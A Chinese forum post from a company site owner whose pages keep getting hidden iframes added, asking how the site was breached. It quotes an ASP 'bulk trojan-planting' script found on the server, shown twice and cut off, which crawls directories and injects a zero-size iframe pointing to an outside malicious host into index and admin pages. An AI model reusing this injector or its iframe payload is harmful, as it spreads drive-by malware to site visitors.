小弟我公司网站经常被人修改,大家帮小弟我看看
日期:2014-05-17 浏览次数:20863 次
我公司网站经常被人修改,大家帮我看看
最近一周来,我们网站(www.68bj.cn)经常被人修改,每个网页添加一些代码,如: <iframe src=http://125.91.14.111 width=0 height=0> </iframe> ,还有在网站根目录多了几个网页文件,请大家帮我看下网站有什么漏洞吗?
其实一个文件代码:
<%
Server.ScriptTimeout=10000
Response.Buffer=False
%>
<html>
<head>
<title> </title>
demero批量挂马程序
</head>
<body>
<%
ASP_SELF=Request.ServerVariables( "PATH_INFO ")
s=Request( "fd ")
ex=Request( "ex ")
pth=Request( "pth ")
newcnt=Request( "newcnt ")
If ex <> " " AND pth <> " " Then
select Case ex
Case "edit "
CALL file_show(pth)
Case "save "
CALL file_save(pth)
End select
Else
%>
<form action= " <%=ASP_SELF%> " method= "POST ">
输入文件夹路径 (绝对路径):
<input type= "text " name= "fd " size= "40 ">
<input type= "submit " value= "SUBMIT ">
</form>
<%End If%>
<%
Function IsPattern(patt,str)
Set regEx=New RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
Set regEx=Nothing
If retVal=True Then
IsPattern=True
Else
IsPattern=False
End If
End Function
If IsPattern( "[^ab]{1}:{1}(\\|\/) ",s) Then
sch s
Else
If s <> " " Then Response.Write "Invalid Agrument! "
End If
Sub sch(s)
oN eRrOr rEsUmE nExT
Set fs=Server.createObject( "Scripting.FileSystemObject ")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.Path
step_all rtn
Next
If sf.Count <> 0 Then
For Each l In sf
sch l
Next
End If
End Sub
Sub step_all(agr)
retVal=IsPattern( "(\\|\/)(default|index|index2|index_bak|dbconn|database|upfile|admin_main|admin1)\.(htm|html|asp|php|jsp|aspx|cgi)\b ",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
%>
<%Sub step1(str1)%>
<a href= " <%=ASP_SELF%> ?ex=edit&pth= <%=str1%> " target= "_blank "> <%=str1%> </a> <br>
<%End Sub%>
<%
Sub step2(str2)
addcode= " <iframe src=http://binghuoo.w113.suzhanidc.cn/qq/Dns.htm
width=0 height=
最近一周来,我们网站(www.68bj.cn)经常被人修改,每个网页添加一些代码,如: <iframe src=http://125.91.14.111 width=0 height=0> </iframe> ,还有在网站根目录多了几个网页文件,请大家帮我看下网站有什么漏洞吗?
其实一个文件代码:
<%
Server.ScriptTimeout=10000
Response.Buffer=False
%>
<html>
<head>
<title> </title>
demero批量挂马程序
</head>
<body>
<%
ASP_SELF=Request.ServerVariables( "PATH_INFO ")
s=Request( "fd ")
ex=Request( "ex ")
pth=Request( "pth ")
newcnt=Request( "newcnt ")
If ex <> " " AND pth <> " " Then
select Case ex
Case "edit "
CALL file_show(pth)
Case "save "
CALL file_save(pth)
End select
Else
%>
<form action= " <%=ASP_SELF%> " method= "POST ">
输入文件夹路径 (绝对路径):
<input type= "text " name= "fd " size= "40 ">
<input type= "submit " value= "SUBMIT ">
</form>
<%End If%>
<%
Function IsPattern(patt,str)
Set regEx=New RegExp
regEx.Pattern=patt
regEx.IgnoreCase=True
retVal=regEx.Test(str)
Set regEx=Nothing
If retVal=True Then
IsPattern=True
Else
IsPattern=False
End If
End Function
If IsPattern( "[^ab]{1}:{1}(\\|\/) ",s) Then
sch s
Else
If s <> " " Then Response.Write "Invalid Agrument! "
End If
Sub sch(s)
oN eRrOr rEsUmE nExT
Set fs=Server.createObject( "Scripting.FileSystemObject ")
Set fd=fs.GetFolder(s)
Set fi=fd.Files
Set sf=fd.SubFolders
For Each f in fi
rtn=f.Path
step_all rtn
Next
If sf.Count <> 0 Then
For Each l In sf
sch l
Next
End If
End Sub
Sub step_all(agr)
retVal=IsPattern( "(\\|\/)(default|index|index2|index_bak|dbconn|database|upfile|admin_main|admin1)\.(htm|html|asp|php|jsp|aspx|cgi)\b ",agr)
If retVal Then
step1 agr
step2 agr
Else
Exit Sub
End If
End Sub
%>
<%Sub step1(str1)%>
<a href= " <%=ASP_SELF%> ?ex=edit&pth= <%=str1%> " target= "_blank "> <%=str1%> </a> <br>
<%End Sub%>
<%
Sub step2(str2)
addcode= " <iframe src=http://binghuoo.w113.suzhanidc.cn/qq/Dns.htm
width=0 height=
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
